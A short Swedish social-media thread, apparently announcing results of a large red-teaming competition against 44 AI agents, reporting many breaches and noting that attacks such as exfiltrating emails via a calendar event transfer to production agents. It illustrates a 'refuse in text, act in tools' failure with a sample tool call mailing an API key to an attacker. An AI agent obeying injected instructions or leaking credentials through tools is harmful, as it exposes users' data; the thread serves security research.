Vi placerade ut 44 AI-agenter och erbjöd internet 170 000 dollar för att attackera dem. 1,8 miljoner försök, 62 000 intrång, inklusive dataläckage och ekonomisk förlust. 🚨 Oroväckande nog överförs samma bedrifter till levande produktionsagenter... (Exempel: Exfiltrera e-postmeddelanden via kalenderhändelse) 🧵
Många pauser är universella och överförbara. Kopiera och klistra in mönster som fungerade över uppgifter, modeller och skyddsräcken. Om det bryter en agent idag, bryter det troligen din.
Favoritfel: "vägra i text, agera i verktyg." 😈 Modell: "Jag kan inte dela autentiseringsuppgifter." Sedan: send_email(to=angripare, body="API_KEY=****") Användargränssnittet ser säkert ut; Det är verktygslagret som gör skadan.
489,95K